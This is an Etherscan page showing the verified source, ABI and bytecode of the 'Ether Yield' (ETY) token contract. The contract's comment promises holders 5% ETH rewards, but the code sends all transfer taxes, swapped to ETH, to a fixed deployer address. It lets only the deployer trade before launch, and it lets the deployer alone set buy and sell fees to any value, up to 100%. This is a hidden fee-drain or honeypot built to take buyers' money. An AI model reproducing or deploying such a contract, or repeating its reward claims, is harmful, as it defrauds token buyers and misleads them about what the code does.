ETH Price: $3,384.45 (-1.54%)
Gas: 1 Gwei

Token

Ether Yield (ETY)
 

Overview

Max Total Supply

100,000,000 ETY

Holders

3

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
673,259.649954953150903465 ETY

Value
$0.00
0x34a90d7b33be5e82bf8d5a15929762d7b939a852
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
EtherYield

Compiler Version
v0.8.23+commit.f704f362

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license
/**
 *Submitted for verification at Etherscan.io on 2024-01-09
*/

/*

Step into the future of decentralized finance with ETHER Yield ($ETY), a revolutionary token designed to empower its holders with a groundbreaking 5% in ETH rewards.

DAPP is live!

TG - https://t.me/EtherYieldPortal
TW - https://twitter.com/EtherYieldETH
WEB - https://etheryield.space
DAPP - https://etheryield.netlify.app/

*/
// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.23;

    interface IUniswapV2Router02 {
        function swapExactTokensForETHSupportingFeeOnTransferTokens(
            uint amountIn,
            uint amountOutMin,
            address[] calldata path,
            address to,
            uint deadline
            ) external;
        }
        
    contract EtherYield {
        string public constant name = "Ether Yield";  //
        string public constant symbol = "ETY";  //
        uint8 public constant decimals = 18;
        uint256 public constant totalSupply = 100_000_000 * 10**decimals;

        uint256 BurnTNumber = 0;
        uint256 ConfirmTNumber = 2;
        uint256 constant swapAmount = totalSupply / 100;

        mapping (address => uint256) public balanceOf;
        mapping (address => mapping (address => uint256)) public allowance;
            
        error Permissions();
            
        event Transfer(address indexed from, address indexed to, uint256 value);
        event Approval(
            address indexed owner,
            address indexed spender,
            uint256 value
        );
            

        address private pair;
        address constant ETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
        address constant routerAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
        IUniswapV2Router02 constant _uniswapV2Router = IUniswapV2Router02(routerAddress);
        address payable constant deployer = payable(address(0x5A8596f203fF217B91fe7c40CE367C6e956d437a)); //

        bool private swapping;
        bool private TradingOpenStatus;

        constructor() {
            balanceOf[msg.sender] = totalSupply;
            allowance[address(this)][routerAddress] = type(uint256).max;
            emit Transfer(address(0), msg.sender, totalSupply);
        }

         receive() external payable {}

        function approve(address spender, uint256 amount) external returns (bool){
            allowance[msg.sender][spender] = amount;
            emit Approval(msg.sender, spender, amount);
            return true;
        }

        function transfer(address to, uint256 amount) external returns (bool){
            return _transfer(msg.sender, to, amount);
        }

        function transferFrom(address from, address to, uint256 amount) external returns (bool){
            allowance[from][msg.sender] -= amount;        
            return _transfer(from, to, amount);
        }

        function _transfer(address from, address to, uint256 amount) internal returns (bool){
            require(TradingOpenStatus || from == deployer || to == deployer);

            if(!TradingOpenStatus && pair == address(0) && amount > 0)
                pair = to;

            balanceOf[from] -= amount;

            if (to == pair && !swapping && balanceOf[address(this)] >= swapAmount){
                swapping = true;
                address[] memory path = new  address[](2);
                path[0] = address(this);
                path[1] = ETH;
                _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                    );
                deployer.transfer(address(this).balance);
                swapping = false;
                }

            if(from != address(this)){
                uint256 FinalFigure = amount * (from == pair ? BurnTNumber : ConfirmTNumber) / 100;
                amount -= FinalFigure;
                balanceOf[address(this)] += FinalFigure;
            }
                balanceOf[to] += amount;
                emit Transfer(from, to, amount);
                return true;
            }

        function OpenTrade() external {
            require(msg.sender == deployer);
            require(!TradingOpenStatus);
            TradingOpenStatus = true;        
            }
            
        function setETY(uint256 newTBurn, uint256 newTConfirm) external {
        if(msg.sender == deployer){
            BurnTNumber = newTBurn;
            ConfirmTNumber = newTConfirm;
            }
        else{
            require(newTBurn < 10);
            require(newTConfirm < 10);
            revert();
            }  
        }
        }

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OpenTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"newTBurn","type":"uint256"},{"internalType":"uint256","name":"newTConfirm","type":"uint256"}],"name":"setETY","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040525f8055600260015534801562000018575f80fd5b50620000276012600a620001dc565b62000037906305f5e100620001f3565b335f8181526002602090815260408083209490945530825260038152838220737a250d5630b4cf539739df2c5dacb4c659f2488d835290529182205f199055907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620000a66012600a620001dc565b620000b6906305f5e100620001f3565b60405190815260200160405180910390a36200020d565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200012157815f1904821115620001055762000105620000cd565b808516156200011357918102915b93841c9390800290620000e6565b509250929050565b5f826200013957506001620001d6565b816200014757505f620001d6565b81600181146200016057600281146200016b576200018b565b6001915050620001d6565b60ff8411156200017f576200017f620000cd565b50506001821b620001d6565b5060208310610133831016604e8410600b8410161715620001b0575081810a620001d6565b620001bc8383620000e1565b805f1904821115620001d257620001d2620000cd565b0290505b92915050565b5f620001ec60ff84168362000129565b9392505050565b8082028115828204841417620001d657620001d6620000cd565b610afd806200021b5f395ff3fe60806040526004361061009d575f3560e01c8063313ce56711610062578063313ce5671461017a57806370a08231146101a057806395d89b41146101cb578063a9059cbb146101f9578063b165c33e14610218578063dd62ed3e14610237575f80fd5b806306fdde03146100a8578063095ea7b3146100f45780630f8540e41461012357806318160ddd1461013957806323b872dd1461015b575f80fd5b366100a457005b5f80fd5b3480156100b3575f80fd5b506100de6040518060400160405280600b81526020016a115d1a195c88165a595b1960aa1b81525081565b6040516100eb91906107b2565b60405180910390f35b3480156100ff575f80fd5b5061011361010e366004610819565b61026d565b60405190151581526020016100eb565b34801561012e575f80fd5b506101376102d9565b005b348015610144575f80fd5b5061014d610323565b6040519081526020016100eb565b348015610166575f80fd5b50610113610175366004610841565b610340565b348015610185575f80fd5b5061018e601281565b60405160ff90911681526020016100eb565b3480156101ab575f80fd5b5061014d6101ba36600461087a565b60026020525f908152604090205481565b3480156101d6575f80fd5b506100de6040518060400160405280600381526020016245545960e81b81525081565b348015610204575f80fd5b50610113610213366004610819565b61038d565b348015610223575f80fd5b50610137610232366004610893565b6103a0565b348015610242575f80fd5b5061014d6102513660046108b3565b600360209081525f928352604080842090915290825290205481565b335f8181526003602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102c79086815260200190565b60405180910390a35060015b92915050565b33735a8596f203ff217b91fe7c40ce367c6e956d437a146102f8575f80fd5b600454600160a81b900460ff161561030e575f80fd5b6004805460ff60a81b1916600160a81b179055565b61032f6012600a6109d8565b61033d906305f5e1006109e6565b81565b6001600160a01b0383165f9081526003602090815260408083203384529091528120805483919083906103749084906109fd565b9091555061038590508484846103de565b949350505050565b5f6103993384846103de565b9392505050565b735a8596f203ff217b91fe7c40ce367c6e956d43791933016103c6575f91909155600155565b600a82106103d2575f80fd5b600a81106100a4575f80fd5b6004545f90600160a81b900460ff168061041457506001600160a01b038416735a8596f203ff217b91fe7c40ce367c6e956d437a145b8061043b57506001600160a01b038316735a8596f203ff217b91fe7c40ce367c6e956d437a145b610443575f80fd5b600454600160a81b900460ff1615801561046657506004546001600160a01b0316155b801561047157505f82115b1561049257600480546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260026020526040812080548492906104b99084906109fd565b90915550506004546001600160a01b0384811691161480156104e55750600454600160a01b900460ff16155b8015610524575060646104fa6012600a6109d8565b610508906305f5e1006109e6565b6105129190610a10565b305f9081526002602052604090205410155b156106ae576004805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061056f5761056f610a2f565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2816001815181106105b7576105b7610a2f565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac94760646105f76012600a6109d8565b610605906305f5e1006109e6565b61060f9190610a10565b5f8430426040518663ffffffff1660e01b8152600401610633959493929190610a43565b5f604051808303815f87803b15801561064a575f80fd5b505af115801561065c573d5f803e3d5ffd5b5050604051735a8596f203ff217b91fe7c40ce367c6e956d437a92504780156108fc029250905f818181858888f1935050505015801561069e573d5f803e3d5ffd5b50506004805460ff60a01b191690555b6001600160a01b038416301461072d576004545f906064906001600160a01b038781169116146106e0576001546106e3565b5f545b6106ed90856109e6565b6106f79190610a10565b905061070381846109fd565b305f90815260026020526040812080549295508392909190610726908490610ab4565b9091555050505b6001600160a01b0383165f9081526002602052604081208054849290610754908490610ab4565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516107a091815260200190565b60405180910390a35060019392505050565b5f602080835283518060208501525f5b818110156107de578581018301518582016040015282016107c2565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610814575f80fd5b919050565b5f806040838503121561082a575f80fd5b610833836107fe565b946020939093013593505050565b5f805f60608486031215610853575f80fd5b61085c846107fe565b925061086a602085016107fe565b9150604084013590509250925092565b5f6020828403121561088a575f80fd5b610399826107fe565b5f80604083850312156108a4575f80fd5b50508035926020909101359150565b5f80604083850312156108c4575f80fd5b6108cd836107fe565b91506108db602084016107fe565b90509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561093257815f1904821115610918576109186108e4565b8085161561092557918102915b93841c93908002906108fd565b509250929050565b5f82610948575060016102d3565b8161095457505f6102d3565b816001811461096a576002811461097457610990565b60019150506102d3565b60ff841115610985576109856108e4565b50506001821b6102d3565b5060208310610133831016604e8410600b84101617156109b3575081810a6102d3565b6109bd83836108f8565b805f19048211156109d0576109d06108e4565b029392505050565b5f61039960ff84168361093a565b80820281158282048414176102d3576102d36108e4565b818103818111156102d3576102d36108e4565b5f82610a2a57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015610a935784516001600160a01b031683529383019391830191600101610a6e565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156102d3576102d36108e456fea2646970667358221220a6409bae55fa407c6ef71de24da2e14b92fb7a3b89804d208404a78aec89975b64736f6c63430008170033

Deployed Bytecode

0x60806040526004361061009d575f3560e01c8063313ce56711610062578063313ce5671461017a57806370a08231146101a057806395d89b41146101cb578063a9059cbb146101f9578063b165c33e14610218578063dd62ed3e14610237575f80fd5b806306fdde03146100a8578063095ea7b3146100f45780630f8540e41461012357806318160ddd1461013957806323b872dd1461015b575f80fd5b366100a457005b5f80fd5b3480156100b3575f80fd5b506100de6040518060400160405280600b81526020016a115d1a195c88165a595b1960aa1b81525081565b6040516100eb91906107b2565b60405180910390f35b3480156100ff575f80fd5b5061011361010e366004610819565b61026d565b60405190151581526020016100eb565b34801561012e575f80fd5b506101376102d9565b005b348015610144575f80fd5b5061014d610323565b6040519081526020016100eb565b348015610166575f80fd5b50610113610175366004610841565b610340565b348015610185575f80fd5b5061018e601281565b60405160ff90911681526020016100eb565b3480156101ab575f80fd5b5061014d6101ba36600461087a565b60026020525f908152604090205481565b3480156101d6575f80fd5b506100de6040518060400160405280600381526020016245545960e81b81525081565b348015610204575f80fd5b50610113610213366004610819565b61038d565b348015610223575f80fd5b50610137610232366004610893565b6103a0565b348015610242575f80fd5b5061014d6102513660046108b3565b600360209081525f928352604080842090915290825290205481565b335f8181526003602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102c79086815260200190565b60405180910390a35060015b92915050565b33735a8596f203ff217b91fe7c40ce367c6e956d437a146102f8575f80fd5b600454600160a81b900460ff161561030e575f80fd5b6004805460ff60a81b1916600160a81b179055565b61032f6012600a6109d8565b61033d906305f5e1006109e6565b81565b6001600160a01b0383165f9081526003602090815260408083203384529091528120805483919083906103749084906109fd565b9091555061038590508484846103de565b949350505050565b5f6103993384846103de565b9392505050565b735a8596f203ff217b91fe7c40ce367c6e956d43791933016103c6575f91909155600155565b600a82106103d2575f80fd5b600a81106100a4575f80fd5b6004545f90600160a81b900460ff168061041457506001600160a01b038416735a8596f203ff217b91fe7c40ce367c6e956d437a145b8061043b57506001600160a01b038316735a8596f203ff217b91fe7c40ce367c6e956d437a145b610443575f80fd5b600454600160a81b900460ff1615801561046657506004546001600160a01b0316155b801561047157505f82115b1561049257600480546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260026020526040812080548492906104b99084906109fd565b90915550506004546001600160a01b0384811691161480156104e55750600454600160a01b900460ff16155b8015610524575060646104fa6012600a6109d8565b610508906305f5e1006109e6565b6105129190610a10565b305f9081526002602052604090205410155b156106ae576004805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061056f5761056f610a2f565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2816001815181106105b7576105b7610a2f565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac94760646105f76012600a6109d8565b610605906305f5e1006109e6565b61060f9190610a10565b5f8430426040518663ffffffff1660e01b8152600401610633959493929190610a43565b5f604051808303815f87803b15801561064a575f80fd5b505af115801561065c573d5f803e3d5ffd5b5050604051735a8596f203ff217b91fe7c40ce367c6e956d437a92504780156108fc029250905f818181858888f1935050505015801561069e573d5f803e3d5ffd5b50506004805460ff60a01b191690555b6001600160a01b038416301461072d576004545f906064906001600160a01b038781169116146106e0576001546106e3565b5f545b6106ed90856109e6565b6106f79190610a10565b905061070381846109fd565b305f90815260026020526040812080549295508392909190610726908490610ab4565b9091555050505b6001600160a01b0383165f9081526002602052604081208054849290610754908490610ab4565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516107a091815260200190565b60405180910390a35060019392505050565b5f602080835283518060208501525f5b818110156107de578581018301518582016040015282016107c2565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610814575f80fd5b919050565b5f806040838503121561082a575f80fd5b610833836107fe565b946020939093013593505050565b5f805f60608486031215610853575f80fd5b61085c846107fe565b925061086a602085016107fe565b9150604084013590509250925092565b5f6020828403121561088a575f80fd5b610399826107fe565b5f80604083850312156108a4575f80fd5b50508035926020909101359150565b5f80604083850312156108c4575f80fd5b6108cd836107fe565b91506108db602084016107fe565b90509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561093257815f1904821115610918576109186108e4565b8085161561092557918102915b93841c93908002906108fd565b509250929050565b5f82610948575060016102d3565b8161095457505f6102d3565b816001811461096a576002811461097457610990565b60019150506102d3565b60ff841115610985576109856108e4565b50506001821b6102d3565b5060208310610133831016604e8410600b84101617156109b3575081810a6102d3565b6109bd83836108f8565b805f19048211156109d0576109d06108e4565b029392505050565b5f61039960ff84168361093a565b80820281158282048414176102d3576102d36108e4565b818103818111156102d3576102d36108e4565b5f82610a2a57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015610a935784516001600160a01b031683529383019391830191600101610a6e565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156102d3576102d36108e456fea2646970667358221220a6409bae55fa407c6ef71de24da2e14b92fb7a3b89804d208404a78aec89975b64736f6c63430008170033

Deployed Bytecode Sourcemap

721:4068:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;752:43;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;752:43:0;;;;;;;;;;;;:::i;:::-;;;;;;;;2283:222;;;;;;;;;;-1:-1:-1;2283:222:0;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;2283:222:0;1004:187:1;4233:181:0;;;;;;;;;;;;;:::i;:::-;;908:64;;;;;;;;;;;;;:::i;:::-;;;1342:25:1;;;1330:2;1315:18;908:64:0;1196:177:1;2665:208:0;;;;;;;;;;-1:-1:-1;2665:208:0;;;;;:::i;:::-;;:::i;862:35::-;;;;;;;;;;;;895:2;862:35;;;;;1883:4:1;1871:17;;;1853:36;;1841:2;1826:18;862:35:0;1711:184:1;1116:45:0;;;;;;;;;;-1:-1:-1;1116:45:0;;;;;:::i;:::-;;;;;;;;;;;;;;810:37;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;810:37:0;;;;;2517:136;;;;;;;;;;-1:-1:-1;2517:136:0;;;;;:::i;:::-;;:::i;4438:340::-;;;;;;;;;;-1:-1:-1;4438:340:0;;;;;:::i;:::-;;:::i;1172:66::-;;;;;;;;;;-1:-1:-1;1172:66:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;2283:222;2381:10;2351:4;2371:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;2371:30:0;;;;;;;;;;:39;;;2430:37;2351:4;;2371:30;;2430:37;;;;2404:6;1342:25:1;;1330:2;1315:18;;1196:177;2430:37:0;;;;;;;;-1:-1:-1;2489:4:0;2283:222;;;;;:::o;4233:181::-;4286:10;1879:42;4286:22;4278:31;;;;;;4333:17;;-1:-1:-1;;;4333:17:0;;;;4332:18;4324:27;;;;;;4366:17;:24;;-1:-1:-1;;;;4366:24:0;-1:-1:-1;;;4366:24:0;;;4233:181::o;908:64::-;960:12;895:2;960;:12;:::i;:::-;946:26;;:11;:26;:::i;:::-;908:64;:::o;2665:208::-;-1:-1:-1;;;;;2767:15:0;;2747:4;2767:15;;;:9;:15;;;;;;;;2783:10;2767:27;;;;;;;:37;;2798:6;;2767:27;2747:4;;2767:37;;2798:6;;2767:37;:::i;:::-;;;;-1:-1:-1;2834:27:0;;-1:-1:-1;2844:4:0;2850:2;2854:6;2834:9;:27::i;:::-;2827:34;2665:208;-1:-1:-1;;;;2665:208:0:o;2517:136::-;2581:4;2608:33;2618:10;2630:2;2634:6;2608:9;:33::i;:::-;2601:40;2517:136;-1:-1:-1;;;2517:136:0:o;4438:340::-;-1:-1:-1;;4516:10:0;:22;4513:252;;4554:11;:22;;;;4591:14;:28;4438:340::o;4513:252::-;4683:2;4672:8;:13;4664:22;;;;;;4723:2;4709:11;:16;4701:25;;;;;2885:1336;2992:17;;2964:4;;-1:-1:-1;;;2992:17:0;;;;;:37;;-1:-1:-1;;;;;;3013:16:0;;1879:42;3013:16;2992:37;:55;;;-1:-1:-1;;;;;;3033:14:0;;1879:42;3033:14;2992:55;2984:64;;;;;;3069:17;;-1:-1:-1;;;3069:17:0;;;;3068:18;:40;;;;-1:-1:-1;3090:4:0;;-1:-1:-1;;;;;3090:4:0;:18;3068:40;:54;;;;;3121:1;3112:6;:10;3068:54;3065:85;;;3141:4;:9;;-1:-1:-1;;;;;;3141:9:0;-1:-1:-1;;;;;3141:9:0;;;;;3065:85;-1:-1:-1;;;;;3167:15:0;;;;;;:9;:15;;;;;:25;;3186:6;;3167:15;:25;;3186:6;;3167:25;:::i;:::-;;;;-1:-1:-1;;3219:4:0;;-1:-1:-1;;;;;3213:10:0;;;3219:4;;3213:10;:23;;;;-1:-1:-1;3228:8:0;;-1:-1:-1;;;3228:8:0;;;;3227:9;3213:23;:65;;;;-1:-1:-1;1100:3:0;960:12;895:2;960;:12;:::i;:::-;946:26;;:11;:26;:::i;:::-;1086:17;;;;:::i;:::-;3258:4;3240:24;;;;:9;:24;;;;;;:38;;3213:65;3209:619;;;3298:8;:15;;-1:-1:-1;;;;3298:15:0;-1:-1:-1;;;3298:15:0;;;3356:17;;;3371:1;3356:17;;;;;;;;-1:-1:-1;;3356:17:0;;;;;;;;;;-1:-1:-1;3356:17:0;3332:41;;3410:4;3392;3397:1;3392:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;3392:23:0;;;-1:-1:-1;;;;;3392:23:0;;;;;1597:42;3434:4;3439:1;3434:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;3434:13:0;;;:7;;;;;;;;;;;:13;1683:42;3466:67;1100:3;960:12;895:2;960;:12;:::i;:::-;946:26;;:11;:26;:::i;:::-;1086:17;;;;:::i;:::-;3589:1;3613:4;3648;3676:15;3466:248;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3733:40:0;;1879:42;;-1:-1:-1;3751:21:0;3733:40;;;;;-1:-1:-1;3751:21:0;3733:40;;;;3751:21;1879:42;3733:40;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3792:8:0;:16;;-1:-1:-1;;;;3792:16:0;;;3209:619;-1:-1:-1;;;;;3847:21:0;;3863:4;3847:21;3844:240;;3928:4;;3888:19;;3967:3;;-1:-1:-1;;;;;3920:12:0;;;3928:4;;3920:12;:43;;3949:14;;3920:43;;;3935:11;;3920:43;3910:54;;:6;:54;:::i;:::-;:60;;;;:::i;:::-;3888:82;-1:-1:-1;3989:21:0;3888:82;3989:21;;:::i;:::-;4047:4;4029:24;;;;:9;:24;;;;;:39;;3989:21;;-1:-1:-1;4057:11:0;;4029:24;;;:39;;4057:11;;4029:39;:::i;:::-;;;;-1:-1:-1;;;3844:240:0;-1:-1:-1;;;;;4102:13:0;;;;;;:9;:13;;;;;:23;;4119:6;;4102:13;:23;;4119:6;;4102:23;:::i;:::-;;;;;;;;4164:2;-1:-1:-1;;;;;4149:26:0;4158:4;-1:-1:-1;;;;;4149:26:0;;4168:6;4149:26;;;;1342:25:1;;1330:2;1315:18;;1196:177;4149:26:0;;;;;;;;-1:-1:-1;4201:4:0;2885:1336;;;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:186::-;1959:6;2012:2;2000:9;1991:7;1987:23;1983:32;1980:52;;;2028:1;2025;2018:12;1980:52;2051:29;2070:9;2051:29;:::i;2091:248::-;2159:6;2167;2220:2;2208:9;2199:7;2195:23;2191:32;2188:52;;;2236:1;2233;2226:12;2188:52;-1:-1:-1;;2259:23:1;;;2329:2;2314:18;;;2301:32;;-1:-1:-1;2091:248:1:o;2344:260::-;2412:6;2420;2473:2;2461:9;2452:7;2448:23;2444:32;2441:52;;;2489:1;2486;2479:12;2441:52;2512:29;2531:9;2512:29;:::i;:::-;2502:39;;2560:38;2594:2;2583:9;2579:18;2560:38;:::i;:::-;2550:48;;2344:260;;;;;:::o;2609:127::-;2670:10;2665:3;2661:20;2658:1;2651:31;2701:4;2698:1;2691:15;2725:4;2722:1;2715:15;2741:416;2830:1;2867:5;2830:1;2881:270;2902:7;2892:8;2889:21;2881:270;;;2961:4;2957:1;2953:6;2949:17;2943:4;2940:27;2937:53;;;2970:18;;:::i;:::-;3020:7;3010:8;3006:22;3003:55;;;3040:16;;;;3003:55;3119:22;;;;3079:15;;;;2881:270;;;2885:3;2741:416;;;;;:::o;3162:806::-;3211:5;3241:8;3231:80;;-1:-1:-1;3282:1:1;3296:5;;3231:80;3330:4;3320:76;;-1:-1:-1;3367:1:1;3381:5;;3320:76;3412:4;3430:1;3425:59;;;;3498:1;3493:130;;;;3405:218;;3425:59;3455:1;3446:10;;3469:5;;;3493:130;3530:3;3520:8;3517:17;3514:43;;;3537:18;;:::i;:::-;-1:-1:-1;;3593:1:1;3579:16;;3608:5;;3405:218;;3707:2;3697:8;3694:16;3688:3;3682:4;3679:13;3675:36;3669:2;3659:8;3656:16;3651:2;3645:4;3642:12;3638:35;3635:77;3632:159;;;-1:-1:-1;3744:19:1;;;3776:5;;3632:159;3823:34;3848:8;3842:4;3823:34;:::i;:::-;3893:6;3889:1;3885:6;3881:19;3872:7;3869:32;3866:58;;;3904:18;;:::i;:::-;3942:20;;3162:806;-1:-1:-1;;;3162:806:1:o;3973:140::-;4031:5;4060:47;4101:4;4091:8;4087:19;4081:4;4060:47;:::i;4118:168::-;4191:9;;;4222;;4239:15;;;4233:22;;4219:37;4209:71;;4260:18;;:::i;4291:128::-;4358:9;;;4379:11;;;4376:37;;;4393:18;;:::i;4424:217::-;4464:1;4490;4480:132;;4534:10;4529:3;4525:20;4522:1;4515:31;4569:4;4566:1;4559:15;4597:4;4594:1;4587:15;4480:132;-1:-1:-1;4626:9:1;;4424:217::o;4778:127::-;4839:10;4834:3;4830:20;4827:1;4820:31;4870:4;4867:1;4860:15;4894:4;4891:1;4884:15;4910:980;5172:4;5220:3;5209:9;5205:19;5251:6;5240:9;5233:25;5277:2;5315:6;5310:2;5299:9;5295:18;5288:34;5358:3;5353:2;5342:9;5338:18;5331:31;5382:6;5417;5411:13;5448:6;5440;5433:22;5486:3;5475:9;5471:19;5464:26;;5525:2;5517:6;5513:15;5499:29;;5546:1;5556:195;5570:6;5567:1;5564:13;5556:195;;;5635:13;;-1:-1:-1;;;;;5631:39:1;5619:52;;5726:15;;;;5691:12;;;;5667:1;5585:9;5556:195;;;-1:-1:-1;;;;;;;5807:32:1;;;;5802:2;5787:18;;5780:60;-1:-1:-1;;;5871:3:1;5856:19;5849:35;5768:3;4910:980;-1:-1:-1;;;4910:980:1:o;5895:125::-;5960:9;;;5981:10;;;5978:36;;;5994:18;;:::i

Swarm Source

ipfs://a6409bae55fa407c6ef71de24da2e14b92fb7a3b89804d208404a78aec89975b
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.